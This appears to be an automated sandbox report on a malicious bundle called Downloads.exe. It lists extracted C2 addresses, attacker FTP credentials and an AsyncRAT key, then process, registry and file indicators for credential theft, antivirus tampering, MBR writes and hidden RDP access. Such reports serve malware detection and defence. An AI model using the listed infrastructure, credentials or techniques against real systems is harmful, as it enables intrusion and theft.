Downloads.exe

General
Target

Downloads.exe

Filesize

141MB

Completed

19-11-2020 17:48

Score
10 /10
MD5

07917bc6f34323a498bbbf68eb446724

SHA1

6f192776575fe4087684d24a0a5fb07e5a1c76ed

SHA256

a6942a7cce17a9de2ff1679f685796468698f06a45f6e4e97b9ff5027ef35a86

Malware Config

Extracted

Credentials

Protocol: ftp

Host: 45.141.184.35

Port: 21

Username: alex

Password: easypassword

Extracted

Credentials

Protocol: ftp

Host: 109.248.203.91

Port: 21

Username: alex

Password: easypassword

Extracted

Family azorult
C2

http://195.245.112.115/index.php

Extracted

Family warzonerat
C2

sandyclark255.hopto.org:5200

Extracted

Family asyncrat
Version 0.5.6A
C2

sandyclark255.hopto.org:6606

sandyclark255.hopto.org:8808

sandyclark255.hopto.org:7707

Attributes
aes_key
DStgwPf5qCYAcWWcPg3CaZBkDbYF3HQo
anti_detection
true
autorun
true
bdos
false
delay
host
sandyclark255.hopto.org
hwid
install_file
install_folder
%AppData%
mutex
adweqsds56332
pastebin_config
null
port
6606,8808,7707
version
0.5.6A
aes.plain
Signatures 72

Filter: none

Collection
Credential Access
Defense Evasion
Discovery
Execution
Impact
Persistence
  • AsyncRat

    Description

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    Description

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Modifies Windows Defender Real-time Protection settings

    TTPs

    Modify RegistryModify Existing ServiceDisabling Security Tools
  • Modifies visiblity of hidden/system files in Explorer

    Tags

    TTPs

    Hidden Files and DirectoriesModify Registry
  • Pony,Fareit

    Description

    Pony is a Remote Access Trojan application that steals information.

  • RMS

    Description

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • RedLine

    Description

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000300000001ac16-302.datfamily_redline
    behavioral1/files/0x000300000001ac16-304.datfamily_redline
  • WarzoneRat, AveMaria

    Description

    WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.

  • Windows security bypass

    TTPs

    Disabling Security ToolsModify Registry
  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    Tags

  • ACProtect 1.3x - 1.4x DLL software

    Description

    Detects file using ACProtect software.

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000100000001abd9-47.datacprotect
    behavioral1/files/0x000100000001abda-48.datacprotect
  • Async RAT payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/5208-944-0x0000000006CE0000-0x0000000006CED000-memory.dmpasyncrat
  • Grants admin privileges

    Description

    Uses net.exe to modify the user's privileges.

    TTPs

    Account Manipulation
  • Nirsoft

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000100000001ad04-458.datNirsoft
    behavioral1/files/0x000100000001ad04-457.datNirsoft
    behavioral1/files/0x000500000001ac3c-475.datNirsoft
    behavioral1/files/0x000500000001ac3c-474.datNirsoft
    behavioral1/files/0x000200000001ad33-487.datNirsoft
    behavioral1/files/0x000200000001ad33-486.datNirsoft
    behavioral1/files/0x000400000001ad33-494.datNirsoft
    behavioral1/files/0x000400000001ad33-495.datNirsoft
  • Warzone RAT Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/memory/5580-680-0x0000000000400000-0x0000000000554000-memory.dmpwarzonerat
    behavioral1/memory/5580-682-0x0000000000405CE2-mapping.dmpwarzonerat
    behavioral1/memory/5580-685-0x0000000000400000-0x0000000000554000-memory.dmpwarzonerat
  • XMRig Miner Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000100000001ac11-1868.datxmrig
  • ASPack v2.12-2.42

    Description

    Detects executables packed with ASPack v2.12-2.42

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000100000001abd7-34.dataspack_v212_v242
    behavioral1/files/0x000100000001abd7-33.dataspack_v212_v242
    behavioral1/files/0x000100000001abd7-40.dataspack_v212_v242
    behavioral1/files/0x000100000001abd7-42.dataspack_v212_v242
    behavioral1/files/0x000100000001abd7-43.dataspack_v212_v242
  • Blocks application from running via registry modification

    Description

    Adds application to list of disallowed applications.

    Tags

  • Drops file in Drivers directory
    cmd.exeOnlineInstaller.tmpupdate.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\drivers\etc\hostscmd.exe
    File createdC:\Windows\system32\drivers\iaStorE.sysOnlineInstaller.tmp
    File opened for modificationC:\Windows\System32\drivers\etc\hostsupdate.exe
  • Executes dropped EXE
    update.exewini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.execheat.exetaskhost.exetaskhostw.exeR8.exetaskhost.exewinlogon.exeRar.exeutorrent.exeazur.exeupdate.exeRDPWInst.exeapi.exeRemouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exeOnlineInstaller.exesystem.exeOnlineInstaller.tmp42f972925508a82236e8533567487761.exeRDPWinst.exeintro.exekeygen-pr.exekeygen-step-1.exekeygen-step-4.exeRDPWInst.exe002.exekey.exekey.exeSetup.exesetup.exeRDPWinst.exealiens.exejg2_2qua.exe97535F5358BB4449.exe97535F5358BB4449.exe1605810348493.exehjjgaa.exejfiag_gg.exe1605810353930.exejfiag_gg.exe1605810359509.exe1605810362353.exetaskhostw.exe

    Reported IOCs

    pidprocess
    4028update.exe
    768wini.exe
    632winit.exe
    2108rutserv.exe
    1628rutserv.exe
    1276rutserv.exe
    2228rutserv.exe
    1200cheat.exe
    1712taskhost.exe
    4964taskhostw.exe
    4156R8.exe
    4244taskhost.exe
    4656winlogon.exe
    4844Rar.exe
    576utorrent.exe
    3548azur.exe
    4932update.exe
    1400RDPWInst.exe
    1620api.exe
    2304Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
    4404OnlineInstaller.exe
    4416system.exe
    4856OnlineInstaller.tmp
    422442f972925508a82236e8533567487761.exe
    4216RDPWinst.exe
    5136intro.exe
    5216keygen-pr.exe
    5252keygen-step-1.exe
    5448keygen-step-4.exe
    5692RDPWInst.exe
    5720002.exe
    5728key.exe
    5868key.exe
    5948Setup.exe
    6140setup.exe
    5316RDPWinst.exe
    5192aliens.exe
    4948jg2_2qua.exe
    530497535F5358BB4449.exe
    537297535F5358BB4449.exe
    57241605810348493.exe
    4056hjjgaa.exe
    6120jfiag_gg.exe
    56321605810353930.exe
    6112jfiag_gg.exe
    53921605810359509.exe
    59281605810362353.exe
    5712taskhostw.exe
  • Modifies Windows Firewall

    Tags

    TTPs

    Modify Existing Service
  • Sets DLL path for service in the registry

    TTPs

    Registry Run Keys / Startup FolderModify Registry
  • Sets file to hidden

    Description

    Modifies file attributes to stop it showing in Explorer etc.

    Tags

    TTPs

    Hidden Files and Directories
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Suspicious Office macro

    Description

    Office document equipped with 4.0 macros.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000100000001ac67-418.datoffice_xlm_macros
  • UPX packed file

    Description

    Detects executables packed with UPX/modified UPX open source packer.

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral1/files/0x000100000001abd9-47.datupx
    behavioral1/files/0x000100000001abda-48.datupx
    behavioral1/files/0x000100000001ac1b-232.datupx
    behavioral1/files/0x000100000001ac1b-234.datupx
    behavioral1/files/0x000100000001ac23-253.datupx
    behavioral1/files/0x000100000001ac23-254.datupx
    behavioral1/files/0x000300000001ac13-279.datupx
    behavioral1/files/0x000300000001ac13-280.datupx
    behavioral1/files/0x000100000001ad2e-466.datupx
    behavioral1/files/0x000100000001ad2e-465.datupx
    behavioral1/files/0x000100000001ad2e-479.datupx
    behavioral1/files/0x000100000001ad2e-480.datupx
    behavioral1/memory/1976-1605-0x0000000000400000-0x0000000000472000-memory.dmpupx
    behavioral1/memory/1976-1609-0x0000000000400000-0x0000000000472000-memory.dmpupx
    behavioral1/memory/1976-1610-0x0000000000400000-0x0000000000472000-memory.dmpupx
    behavioral1/files/0x000100000001ac1b-1781.datupx
  • Loads dropped DLL
    azur.exeSetup.exesvchost.exeMsiExec.exe

    Reported IOCs

    pidprocess
    3548azur.exe
    3548azur.exe
    3548azur.exe
    3548azur.exe
    3548azur.exe
    3548azur.exe
    5948Setup.exe
    5948Setup.exe
    5948Setup.exe
    4492svchost.exe
    4424MsiExec.exe
  • Modifies file permissions
    icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    4640icacls.exe
    5096icacls.exe
    2920icacls.exe
    4344icacls.exe
    3580icacls.exe
    4280icacls.exe
    2224icacls.exe
    3492icacls.exe
    4852icacls.exe
    4176icacls.exe
    5044icacls.exe
    4496icacls.exe
    4504icacls.exe
    4960icacls.exe
    4840icacls.exe
    3004icacls.exe
    4464icacls.exe
    4596icacls.exe
    4116icacls.exe
    4212icacls.exe
    4732icacls.exe
    4380icacls.exe
    4192icacls.exe
    5004icacls.exe
    4140icacls.exe
    5108icacls.exe
    1300icacls.exe
    5028icacls.exe
    4728icacls.exe
    4648icacls.exe
    3844icacls.exe
    3028icacls.exe
    4888icacls.exe
    3932icacls.exe
    924icacls.exe
    4548icacls.exe
    4308icacls.exe
    4124icacls.exe
    1760icacls.exe
    4296icacls.exe
    2352icacls.exe
    1904icacls.exe
    4788icacls.exe
    572icacls.exe
    4164icacls.exe
    4704icacls.exe
    4828icacls.exe
    4584icacls.exe
    1368icacls.exe
    1812icacls.exe
    4304icacls.exe
    4968icacls.exe
    4708icacls.exe
    4756icacls.exe
    4276icacls.exe
    4692icacls.exe
  • Reads data files stored by FTP clients

    Description

    Tries to access configuration files associated with programs like FileZilla.

    TTPs

    Data from Local SystemCredentials in Files
  • Reads local data of messenger clients

    Description

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

    TTPs

    Data from Local SystemCredentials in Files
  • Reads user/profile data of local email clients

    Description

    Email clients store some user data on disk where infostealers will often target it.

    TTPs

    Data from Local SystemCredentials in Files
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials etc.

    TTPs

    Data from Local SystemCredentials in Files
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    Tags

    TTPs

    Data from Local SystemCredentials in Files
  • Adds Run key to start application
    taskhostw.exehjjgaa.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runtaskhostw.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"taskhostw.exe
    Set value (str)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\kissq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kissq.exe"hjjgaa.exe
  • Checks for any installed AV software in registry
    OnlineInstaller.exe

    TTPs

    Security Software Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AviraOnlineInstaller.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    Tags

    TTPs

    Query Registry
  • Checks whether UAC is enabled
    aliens.exejg2_2qua.exe97535F5358BB4449.exe97535F5358BB4449.exe

    TTPs

    System Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUAaliens.exe
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUAjg2_2qua.exe
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA97535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA97535F5358BB4449.exe
  • Enumerates connected drives
    msiexec.exemsiexec.exeapi.exe

    Description

    Attempts to read the root path of hard drives other than the default C: drive.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    File opened (read-only)\??\H:msiexec.exe
    File opened (read-only)\??\U:msiexec.exe
    File opened (read-only)\??\U:api.exe
    File opened (read-only)\??\B:api.exe
    File opened (read-only)\??\Z:api.exe
    File opened (read-only)\??\B:msiexec.exe
    File opened (read-only)\??\V:msiexec.exe
    File opened (read-only)\??\A:api.exe
    File opened (read-only)\??\S:api.exe
    File opened (read-only)\??\V:msiexec.exe
    File opened (read-only)\??\H:msiexec.exe
    File opened (read-only)\??\I:api.exe
    File opened (read-only)\??\Q:api.exe
    File opened (read-only)\??\J:msiexec.exe
    File opened (read-only)\??\O:msiexec.exe
    File opened (read-only)\??\J:msiexec.exe
    File opened (read-only)\??\S:msiexec.exe
    File opened (read-only)\??\K:api.exe
    File opened (read-only)\??\A:msiexec.exe
    File opened (read-only)\??\Q:msiexec.exe
    File opened (read-only)\??\W:msiexec.exe
    File opened (read-only)\??\Y:msiexec.exe
    File opened (read-only)\??\V:api.exe
    File opened (read-only)\??\P:api.exe
    File opened (read-only)\??\K:msiexec.exe
    File opened (read-only)\??\A:msiexec.exe
    File opened (read-only)\??\F:msiexec.exe
    File opened (read-only)\??\P:msiexec.exe
    File opened (read-only)\??\Q:msiexec.exe
    File opened (read-only)\??\H:api.exe
    File opened (read-only)\??\R:api.exe
    File opened (read-only)\??\w:api.exe
    File opened (read-only)\??\Y:msiexec.exe
    File opened (read-only)\??\E:msiexec.exe
    File opened (read-only)\??\I:msiexec.exe
    File opened (read-only)\??\M:msiexec.exe
    File opened (read-only)\??\L:api.exe
    File opened (read-only)\??\F:api.exe
    File opened (read-only)\??\E:msiexec.exe
    File opened (read-only)\??\P:msiexec.exe
    File opened (read-only)\??\N:msiexec.exe
    File opened (read-only)\??\D:api.exe
    File opened (read-only)\??\G:msiexec.exe
    File opened (read-only)\??\O:msiexec.exe
    File opened (read-only)\??\B:msiexec.exe
    File opened (read-only)\??\T:api.exe
    File opened (read-only)\??\Y:api.exe
    File opened (read-only)\??\M:msiexec.exe
    File opened (read-only)\??\N:msiexec.exe
    File opened (read-only)\??\S:msiexec.exe
    File opened (read-only)\??\U:msiexec.exe
    File opened (read-only)\??\G:api.exe
    File opened (read-only)\??\O:api.exe
    File opened (read-only)\??\X:msiexec.exe
    File opened (read-only)\??\N:api.exe
    File opened (read-only)\??\R:msiexec.exe
    File opened (read-only)\??\F:msiexec.exe
    File opened (read-only)\??\J:api.exe
    File opened (read-only)\??\Z:msiexec.exe
    File opened (read-only)\??\E:api.exe
    File opened (read-only)\??\L:msiexec.exe
    File opened (read-only)\??\W:msiexec.exe
    File opened (read-only)\??\R:msiexec.exe
    File opened (read-only)\??\M:api.exe
  • Legitimate hosting services abused for malware hosting/C2

    TTPs

    Web Service
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    15ip-api.com
    60checkip.amazonaws.com
    89ip-api.com
  • Modifies WinLogon
    update.exeRDPWInst.exeRDPWinst.exe

    TTPs

    Winlogon Helper DLLModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsupdate.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"update.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"RDPWInst.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"RDPWinst.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListupdate.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccountsupdate.exe
    Set value (int)\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"update.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListupdate.exe
  • Writes to the Master Boot Record (MBR)
    97535F5358BB4449.exeapi.exealiens.exe97535F5358BB4449.exe

    Description

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    TTPs

    Bootkit

    Reported IOCs

    descriptioniocprocess
    File opened for modification\??\PhysicalDrive097535F5358BB4449.exe
    File opened for modification\??\PhysicalDrive0api.exe
    File opened for modification\??\PhysicalDrive0aliens.exe
    File opened for modification\??\PhysicalDrive097535F5358BB4449.exe
  • Drops file in System32 directory
    rutserv.exetaskhost.exeOnlineInstaller.tmp

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\SysWOW64\exe\rutserv.pdbrutserv.exe
    File opened for modificationC:\Windows\System32\winmgmts:\localhost\taskhost.exe
    File createdC:\Windows\system32\spoolsr.exeOnlineInstaller.tmp
    File createdC:\Windows\system32\MS.datOnlineInstaller.tmp
    File createdC:\Windows\system32\KeyHook64.dllOnlineInstaller.tmp
    File createdC:\Windows\system32\KH.datOnlineInstaller.tmp
    File createdC:\Windows\system32\usp20.dllOnlineInstaller.tmp
    File opened for modificationC:\Windows\SysWOW64\rutserv.pdbrutserv.exe
    File opened for modificationC:\Windows\SysWOW64\symbols\exe\rutserv.pdbrutserv.exe
    File opened for modificationC:\Windows\System32\winmgmts:\localhost\root\CIMV2taskhost.exe
    File createdC:\Windows\system32\UP.datOnlineInstaller.tmp
  • Suspicious use of NtSetInformationThreadHideFromDebugger
    aliens.exe

    Reported IOCs

    pidprocess
    5192aliens.exe
  • Suspicious use of SetThreadContext
    key.exe97535F5358BB4449.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 5728 set thread context of 58685728key.exekey.exe
    PID 5304 set thread context of 3312530497535F5358BB4449.exefirefox.exe
    PID 5304 set thread context of 5940530497535F5358BB4449.exefirefox.exe
    PID 5304 set thread context of 5424530497535F5358BB4449.exefirefox.exe
    PID 5304 set thread context of 4836530497535F5358BB4449.exefirefox.exe
  • Drops file in Program Files directory
    update.exeRDPWInst.exeutorrent.exesetup.exeRDPWinst.exeattrib.exeattrib.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Program Files (x86)\Cezurityupdate.exe
    File opened for modificationC:\Program Files\Common Files\McAfeeupdate.exe
    File opened for modificationC:\Program Files\ESETupdate.exe
    File createdC:\Program Files\RDP Wrapper\rdpwrap.dllRDPWInst.exe
    File opened for modificationC:\Program Files\RDP Wrapper\rdpwrap.iniutorrent.exe
    File opened for modificationC:\Program Files\RDP Wrapperutorrent.exe
    File createdC:\Program Files (x86)\dz7d9shn0mvi\__tmp_rar_sfx_access_check_259482859setup.exe
    File opened for modificationC:\Program Files\Enigma Software Groupupdate.exe
    File opened for modificationC:\Program Files\SpyHunterupdate.exe
    File opened for modificationC:\Program Files\AVAST Softwareupdate.exe
    File opened for modificationC:\Program Files (x86)\AVGupdate.exe
    File createdC:\Program Files\Common Files\System\iediagcmd.exeupdate.exe
    File opened for modificationC:\Program Files\AVGupdate.exe
    File opened for modificationC:\Program Files (x86)\Kaspersky Labupdate.exe
    File createdC:\Program Files\RDP Wrapper\rdpwrap.iniRDPWInst.exe
    File createdC:\Program Files\RDP Wrapper\rdpwrap.iniRDPWinst.exe
    File opened for modificationC:\Program Files\Malwarebytesupdate.exe
    File createdC:\Program Files (x86)\dz7d9shn0mvi\aliens.exesetup.exe
    File opened for modificationC:\Program Files\Cezurityupdate.exe
    File opened for modificationC:\Program Files (x86)\dz7d9shn0mvi\aliens.exesetup.exe
    File opened for modificationC:\Program Files\ByteFenceupdate.exe
    File opened for modificationC:\Program Files (x86)\dz7d9shn0mvisetup.exe
    File createdC:\Program Files\RDP Wrapper\rdpwrap.dllRDPWinst.exe
    File opened for modificationC:\Program Files\RDP Wrapperattrib.exe
    File opened for modificationC:\Program Files (x86)\Panda Securityupdate.exe
    File opened for modificationC:\Program Files (x86)\360update.exe
    File opened for modificationC:\Program Files (x86)\SpyHunterupdate.exe
    File opened for modificationC:\Program Files\COMODOupdate.exe
    File opened for modificationC:\Program Files (x86)\AVAST Softwareupdate.exe
    File opened for modificationC:\Program Files\Kaspersky Labupdate.exe
    File opened for modificationC:\Program Files (x86)\GRIZZLY Antivirusupdate.exe
    File opened for modificationC:\Program Files\RDP Wrapper\rdpwrap.iniattrib.exe
    File opened for modificationC:\Program Files (x86)\Microsoft JDXupdate.exe
    File opened for modificationC:\Program Files\RDP Wrapper\rdpwrap.dllattrib.exe
    File createdC:\Program Files\RDP Wrapper\rdpwrap.iniutorrent.exe
  • Drops file in Windows directory
    MicrosoftEdge.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\Debug\ESE.TXTMicrosoftEdge.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks SCSI registry key(s)
    97535F5358BB4449.exe97535F5358BB4449.exe

    Description

    SCSI information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistryPeripheral Device DiscoverySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName97535F5358BB4449.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&00000097535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc97535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName97535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName97535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc97535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc97535F5358BB4449.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&01000097535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName97535F5358BB4449.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&00000097535F5358BB4449.exe
    Key value queried\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc97535F5358BB4449.exe
    Key opened\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&01000097535F5358BB4449.exe
  • Checks processor information in registry
    winit.exeazur.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0winit.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringwinit.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0azur.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringazur.exe
  • Creates scheduled task(s)
    schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    4408schtasks.exe
    1208schtasks.exe
    2896schtasks.exe
    1080schtasks.exe
    2532schtasks.exe
    4544schtasks.exe
    484schtasks.exe
  • Delays execution with timeout.exe
    timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

    Tags

    Reported IOCs

    pidprocess
    200timeout.exe
    4956timeout.exe
    5112timeout.exe
    5080timeout.exe
    2164timeout.exe
    4528timeout.exe
  • Gathers network information
    ipconfig.exe

    Description

    Uses commandline utility to view network configuration.

    TTPs

    System Information DiscoveryCommand-Line Interface

    Reported IOCs

    pidprocess
    5636ipconfig.exe
  • Kills process with taskkill
    taskkill.exetaskkill.exetaskkill.exetaskkill.exe

    Tags

    Reported IOCs

    pidprocess
    4228taskkill.exe
    2892taskkill.exe
    4316taskkill.exe
    5360taskkill.exe
  • Modifies registry class
    MicrosoftEdge.exeR8.exeDownloads.exewinit.execmd.exewini.exe

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLsMicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\RoamingMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming\ChangeUnitGenerationNeeded = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\FavoritesMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\ContentMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPathMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefixMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local SettingsR8.exe
